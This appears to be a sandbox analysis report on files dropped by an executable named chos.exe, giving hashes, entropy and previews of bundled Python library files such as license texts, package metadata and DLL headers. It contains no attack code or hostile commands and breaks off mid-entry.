MD5:	3B83EF96387F14655FC854DDC3C6BD57
SHA1:	2B8B815229AA8A61E483FB4BA0588B8B6C491890
SHA-256:	CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
SHA-512:	98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
Malicious:	false
Preview:	. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own

C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\METADATA

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4648
Entropy (8bit):	5.006900644756252
Encrypted:	false
SSDEEP:	96:Dx2ZSaCSmS8R902Vpnu386eLQ9Ac+fFZpDN00x2jZ2SBXZJSwTE:9Smzf02Vpnu386mQ9B+TP0vJHJSwTE
MD5:	98ABEAACC0E0E4FC385DFF67B607071A
SHA1:	E8C830D8B0942300C7C87B3B8FD15EA1396E07BD
SHA-256:	6A7B90EFFEE1E09D5B484CDF7232016A43E2D9CC9543BCBB8E494B1EC05E1F59
SHA-512:	F1D59046FFA5B0083A5259CEB03219CCDB8CC6AAC6247250CBD83E70F080784391FCC303F7630E1AD40E5CCF5041A57CB9B68ADEFEC1EBC6C31FCF7FFC65E9B7
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: importlib_metadata.Version: 8.0.0.Summary: Read metadata from Python packages.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/python/importlib_metadata.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: perf.Requires-D

C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\RECORD

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2518
Entropy (8bit):	5.6307766747793275
Encrypted:	false
SSDEEP:	48:UnuXTg06U5J/Vw9l/gfNX7/XzBk9pvJq/fwJOfYrBfnJ/V0XJnzN/3WJV:bXzP/EgdzzBkDJsoIYrBfJ/CXNz9qV
MD5:	EB513CAFA5226DDA7D54AFDCC9AD8A74
SHA1:	B394C7AEC158350BAF676AE3197BEF4D7158B31C
SHA-256:	0D8D3C6EEB9EBBE86CAC7D60861552433C329DA9EA51248B61D02BE2E5E64030
SHA-512:	A0017CFAFF47FDA6067E3C31775FACEE4728C3220C2D4BD70DEF328BD20AA71A343E39DA15CD6B406F62311894C518DFCF5C8A4AE6F853946F26A4B4E767924E
Malicious:	false
Preview:	importlib_metadata-8.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-8.0.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-8.0.0.dist-info/METADATA,sha256=anuQ7_7h4J1bSEzfcjIBakPi2cyVQ7y7jklLHsBeH1k,4648..importlib_metadata-8.0.0.dist-info/RECORD,,..importlib_metadata-8.0.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_metadata-8.0.0.dist-info/WHEEL,sha256=mguMlWGMX-VHnMpKOjjQidIo1ssRlCFu4a4mBpz1s2M,91..importlib_metadata-8.0.0.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=tZNB-23h8Bixi9uCrQqj9Yf0aeC--Josdy3IZRIQeB0,33798..importlib_metadata/__pycache__/__init__.cpython-312.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-312.pyc,,..importlib_metadata/__pycache__/_collections.cpython-312.pyc,,..importlib_metadata/__pycache__/_compat.cpython-312.pyc,,..importlib_metadata/__pycac

C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\WHEEL

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	91
Entropy (8bit):	4.687870576189661
Encrypted:	false
SSDEEP:	3:RtEeXMRYFAVLMvhRRP+tPCCfA5S:RtC1VLMvhjWBBf
MD5:	7D09837492494019EA51F4E97823D79F
SHA1:	7829B4324BB542799494131A270EC3BDAD4DEDEF
SHA-256:	9A0B8C95618C5FE5479CCA4A3A38D089D228D6CB1194216EE1AE26069CF5B363
SHA-512:	A0063220ECDD22C3E735ACFF6DE559ACF3AC4C37B81D37633975A22A28B026F1935CD1957C0FF7D2ECC8B7F83F250310795EECC5273B893FFAB115098F7B9C38
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: setuptools (70.1.1).Root-Is-Purelib: true.Tag: py3-none-any..

C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\top_level.txt

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	19
Entropy (8bit):	3.536886723742169
Encrypted:	false
SSDEEP:	3:JSej0EBERG:50o4G
MD5:	A24465F7850BA59507BF86D89165525C
SHA1:	4E61F9264DE74783B5924249BCFE1B06F178B9AD
SHA-256:	08EDDF0FDCB29403625E4ACCA38A872D5FE6A972F6B02E4914A82DD725804FE0
SHA-512:	ECF1F6B777970F5257BDDD353305447083008CEBD8E5A27C3D1DA9C7BDC3F9BF3ABD6881265906D6D5E11992653185C04A522F4DB5655FF75EEDB766F93D5D48
Malicious:	false
Preview:	importlib_metadata.

C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools\_vendor\jaraco\text\Lorem ipsum.txt

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	ASCII text, with very long lines (888)
Category:	dropped
Size (bytes):	1335
Entropy (8bit):	4.226823573023539
Encrypted:	false
SSDEEP:	24:FP6Hbz+g9RPZ14bJi04L6GEbX4UQF4UkZQhxI2EIhNyu:9E+i6bJmLm43+Uxxnh0u
MD5:	4CE7501F6608F6CE4011D627979E1AE4
SHA1:	78363672264D9CD3F72D5C1D3665E1657B1A5071
SHA-256:	37FEDCFFBF73C4EB9F058F47677CB33203A436FF9390E4D38A8E01C9DAD28E0B
SHA-512:	A4CDF92725E1D740758DA4DD28DF5D1131F70CEF46946B173FE6956CC0341F019D7C4FECC3C9605F354E1308858721DADA825B4C19F59C5AD1CE01AB84C46B24
Malicious:	false
Preview:	Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum..Curabitur pretium tincidunt lacus. Nulla gravida orci a odio. Nullam varius, turpis et commodo pharetra, est eros bibendum elit, nec luctus magna felis sollicitudin mauris. Integer in mauris eu nibh euismod gravida. Duis ac tellus et risus vulputate vehicula. Donec lobortis risus a elit. Etiam tempor. Ut ullamcorper, ligula eu tempor congue, eros est euismod turpis, id tincidunt sapien risus a quam. Maecenas fermentum consequat mi. Donec fermentum. Pellentesque malesuada nulla a mi. Duis sapien sem, aliquet nec, commodo eget, consequat quis, neque.

C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools\_vendor\wheel-0.43.0.dist-info\INSTALLER

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1107
Entropy (8bit):	5.115074330424529
Encrypted:	false
SSDEEP:	24:PWmrRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:ttONJbbvE/NQHOs5eNS3n7
MD5:	7FFB0DB04527CFE380E4F2726BD05EBF
SHA1:	5B39C45A91A556E5F1599604F1799E4027FA0E60
SHA-256:	30C23618679108F3E8EA1D2A658C7CA417BDFC891C98EF1A89FA4FF0C9828654
SHA-512:	205F284F3A7E8E696C70ED7B856EE98C1671C68893F0952EEC40915A383BC452B99899BDC401F9FE161A1BF9B6E2CEA3BCD90615EEE9173301657A2CE4BAFE14
Malicious:	false
Preview:	MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW

C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools\_vendor\wheel-0.43.0.dist-info\METADATA

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	2153
Entropy (8bit):	5.088249746074878
Encrypted:	false
SSDEEP:	48:DEhpFu5MktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEhpiMktjayq/7kOfsUzmbYy
MD5:	EBEA27DA14E3F453119DC72D84343E8C
SHA1:	7CEB6DBE498B69ABF4087637C6F500742FF7E2B4
SHA-256:	59BAC22B00A59D3E5608A56B8CF8EFC43831A36B72792EE4389C9CD4669C7841
SHA-512:	A41593939B9325D40CB67FD3F41CD1C9E9978F162487FB469094C41440B5F48016B9A66BE2E6E4A0406D6EEDB25CE4F5A860BA1E3DC924B81F63CEEE3AE31117
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s

C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools\_vendor\wheel-0.43.0.dist-info\RECORD

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	4557
Entropy (8bit):	5.714200636114494
Encrypted:	false
SSDEEP:	96:QXVuEmegx01TQIvFCiq9H/H7vp88FxTXiJPkGJP4CWweXQHmnDpMI78IegK5EeZR:QXVxAbYkU4CWweXQHmnDpMeV2BvTRqQF
MD5:	44D352C4997560C7BFB82D9360F5985A
SHA1:	BE58C7B8AB32790384E4E4F20865C4A88414B67A
SHA-256:	783E654742611AF88CD9F00BF01A431A219DB536556E63FF981C7BD673070AC9
SHA-512:	281B1D939A560E6A08D0606E5E8CE15F086B4B45738AB41ED6B5821968DC8D764CD6B25DB6BA562A07018C271ABF17A6BC5A380FAD05696ADF1D11EE2C5749C8
Malicious:	false
Preview:	../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache

C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools\_vendor\wheel-0.43.0.dist-info\WHEEL

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.672346887071811
Encrypted:	false
SSDEEP:	3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
MD5:	24019423EA7C0C2DF41C8272A3791E7B
SHA1:	AAE9ECFB44813B68CA525BA7FA0D988615399C86
SHA-256:	1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
SHA-512:	09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.

C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools\_vendor\wheel-0.43.0.dist-info\entry_points.txt

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	104
Entropy (8bit):	4.271713330022269
Encrypted:	false
SSDEEP:	3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
MD5:	6180E17C30BAE5B30DB371793FCE0085
SHA1:	E3A12C421562A77D90A13D8539A3A0F4D3228359
SHA-256:	AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
SHA-512:	69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
Malicious:	false
Preview:	[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..

C:\Users\user\AppData\Local\Temp\_MEI74682\sqlite3.dll

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1540368
Entropy (8bit):	6.577233901213655
Encrypted:	false
SSDEEP:	24576:cmKZpHTv4iPI9FDgJNRs++l8GwLXSz4ih5Z5jWbsxuIl40OwumzuLxIhiE:0rJoDgJNRs+U8GwLXSMIZ5jWb0uIl48R
MD5:	7E632F3263D5049B14F5EDC9E7B8D356
SHA1:	92C5B5F96F1CBA82D73A8F013CBAF125CD0898B8
SHA-256:	66771FBD64E2D3B8514DD0CD319A04CA86CE2926A70F7482DDEC64049E21BE38
SHA-512:	CA1CC67D3EB63BCA3CE59EF34BECCE48042D7F93B807FFCD4155E4C4997DC8B39919AE52AB4E5897AE4DBCB47592C4086FAC690092CAA7AA8D3061FBA7FE04A2
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gsX.#.6.#.6.#.6.*j../.6.3.7.!.6.3.5.'.6.3.2.+.6.3.3...6.hj7. .6.#.7...6.k.>.".6.k.6.".6.k..".6.k.4.".6.Rich#.6.........................PE..d.....g.........." ...).0...(.......................................................P....`..............................................#...........`...............R.../...p..X...0...T..............................@............@..X............................text...9........0.................. ..`.rdata..,....@.......4..............@..@.data...`M...0...D..................@....pdata...............\..............@..@.rsrc........`.......8..............@..@.reloc..X....p.......B..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	709904
Entropy (8bit):	5.861739047785334
Encrypted:	false
SSDEEP:	12288:FYGdLI/X77mvfldCKGihH32W3cnPSqrUgLIe:FYGW7qNxr3cnPXLIe
MD5:	0902D299A2A487A7B0C2D75862B13640
SHA1:	04BCBD5A11861A03A0D323A8050A677C3A88BE13
SHA-256:	2693C7EE4FBA55DC548F641C0CB94485D0E18596FFEF16541BD43A5104C28B20
SHA-512:	8CBEF5A9F2D24DA1014F8F1CCBDDD997A084A0B04DD56BCB6AC38DDB636D05EF7E4EA7F67A085363AAD3F43D45413914E55BDEF14A662E80BE955E6DFC2FECA3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).B...f......P,..............................................<.....`.........................................P...X................................/..........p...T...........................0...@............`..h............................text....@.......B.................. ..`.rdata...?...`...@...F..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_ARC4.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	4.640339306680604
Encrypted:	false
SSDEEP:	192:dLklddyTHThob0q/tJRrlDfNYSOcqgYCWt:ZgcdZq/JJD6gRWt
MD5:	BCD8CAAF9342AB891BB1D8DD45EF0098
SHA1:	EE7760BA0FF2548F25D764F000EFBB1332BE6D3E
SHA-256:	78725D2F55B7400A3FCAFECD35AF7AEB253FBC0FFCDF1903016EB0AABD1B4E50
SHA-512:	8B6FB53AECB514769985EBFDAB1B3C739024597D9C35905E04971D5422256546F7F169BF98F9BAF7D9F42A61CFF3EE7A20664989D3000773BF5EDA10CB3A0C24
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...Y..f.........." ................P........................................p............`..........................................'......0(..d....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata..Z.... ......................@..@.data...H....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..(....`.......*..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_Salsa20.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.0194545642425075
Encrypted:	false
SSDEEP:	192:4t/1nCuqaL0kt7AznuRmceS4lDFhAlcqgcLg:F/k1ACln4lDogcLg
MD5:	F19CB847E567A31FAB97435536C7B783
SHA1:	4C8BFE404AF28C1781740E7767619A5E2D2FF2B7
SHA-256:	1ECE1DC94471D6977DBE2CEEBA3764ADF0625E2203D6257F7C781C619D2A3DAD
SHA-512:	382DC205F703FC3E1F072F17F58E321E1A65B86BE7D9D6B07F24A02A156308A7FEC9B1A621BA1F3428FD6BB413D14AE9ECB2A2C8DD62A7659776CFFDEBB6374C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...Z..f.........." ................P.....................................................`..........................................8......H9..d....`.......P..L............p..(....1...............................1..8............0...............................text...h........................... ..`.rdata..r....0......................@..@.data...H....@.......,..............@....pdata..L....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_chacha20.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	5.037456384995606
Encrypted:	false
SSDEEP:	192:st/1nCuqaL0ktPMn1ENe3erKr5br0YbsiDw6a9lkOcqgRGd:p/kpMIodrXbsiDS95gRGd
MD5:	DC14677EA8A8C933CC41F9CCF2BEDDC1
SHA1:	A6FB87E8F3540743097A467ABE0723247FDAF469
SHA-256:	68F081E96AE08617CF111B21EDED35C1774A5EF1223DF9A161C9445A78F25C73
SHA-512:	3ABA4CFCBBE4B350AB3230D488BD75186427E3AAAF38D19E0E1C7330F16795AD77FB6E26FF39AF29EAF4F5E8C42118CB680F90AFBFCA218AEDA64DC444675BA2
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...Z..f.........." ................P.....................................................`......................................... 8.......8..d....`.......P..d............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..d....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..(....p.......2..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_pkcs1_decode.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14336
Entropy (8bit):	5.09191874780435
Encrypted:	false
SSDEEP:	192:rMVsiXeqVb0lIb0Pj5Jdfpm68WZDInU282tacqgYLg:rM7ali0Pj5JxCaDuUlgYLg
MD5:	C09BB8A30F0F733C81C5C5A3DAD8D76D
SHA1:	46FD3BA87A32D12F4EE14601D1AD73B78EDC81D1
SHA-256:	8A1B751DB47CE7B1D3BD10BEBFFC7442BE4CFB398E96E3B1FF7FB83C88A8953D
SHA-512:	691AC74FAE930E9CEABE782567EFB99C50DD9B8AD607DD7F99A5C7DF2FA2BEB7EDFE2EBB7095A72DA0AE24E688FBABD340EAE8B646D5B8C394FEE8DDD5E60D31
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^:.6?T.6?T.6?T.?G..2?T.dJU.4?T.}GU.5?T.6?U..?T.dJQ.<?T.dJP.>?T.dJW.5?T..J\.7?T..JT.7?T..J..7?T..JV.7?T.Rich6?T.........................PE..d...X..f.........." ................P.....................................................`.........................................`8.......8..d....`.......P..(............p..(....1...............................1..8............0...............................text............................... ..`.rdata..6....0....... ..............@..@.data...x....@......................@....pdata..(....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_aes.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	6.541423493519083
Encrypted:	false
SSDEEP:	384:f/UlZA5PUEllvxL/7v/iKBt5ByU0xGitqzSEkxGG7+tpKHb/LZ7fr52EkifcMxme:klcR7JriEbwDaS4j990th9VDBV
MD5:	0AB25F99CDAACA6B11F2ECBE8223CAD5
SHA1:	7A881B3F84EF39D97A31283DE6D7B7AE85C8BAE6
SHA-256:	6CE8A60D1AB5ADC186E23E3DE864D7ADF6BDD37E3B0C591FA910763C5C26AF60
SHA-512:	11E89EEF34398DF3B144A0303E08B3A4CAF41A9A8CA618C18135F561731F285F8CF821D81179C2C45F6EEB0E496D9DD3ECF6FF202A3C453C80AFEF8582D06C17
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...V..f.........." .....H...H......P.....................................................`.........................................p...........d...............................0......................................8............`...............................text...xG.......H.................. ..`.rdata.."6...`...8...L..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_aesni.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	5.367749645917753
Encrypted:	false
SSDEEP:	192:YiJBj5fq/Rk0kPLhOZ3UucCWuSKPEkA2bD9JXx03cqg5YUMLgs:/k1kTMZEjCWNaA2DTx0g5YUMLg
MD5:	B6EA675C3A35CD6400A7ECF2FB9530D1
SHA1:	0E41751AA48108D7924B0A70A86031DDE799D7D6
SHA-256:	76EF4C1759B5553550AB652B84F8E158BA8F34F29FD090393815F06A1C1DC59D
SHA-512:	E31FD33E1ED6D4DA3957320250282CFD9EB3A64F12DE4BD2DFE3410F66725164D96B27CAA34C501D1A535A5A2442D5F070650FD3014B4B92624EE00F1C3F3197
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.z.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...V..f.........." ......... ......P.....................................................`..........................................9......$:..d....`.......P...............p..(....1...............................1..8............0.. ............................text............................... ..`.rdata.......0......."..............@..@.data...8....@.......2..............@....pdata.......P.......4..............@..@.rsrc........`.......8..............@..@.reloc..(....p.......:..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_arc2.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	5.41148259289073
Encrypted:	false
SSDEEP:	192:w3d9FkHaz0EJvrj+CYuz7ucc9dG7otDr22KcqgOiewZjW:YkHEJzj+X6769lDzagO/w
MD5:	F14E1AA2590D621BE8C10321B2C43132
SHA1:	FD84D11619DFFDF82C563E45B48F82099D9E3130
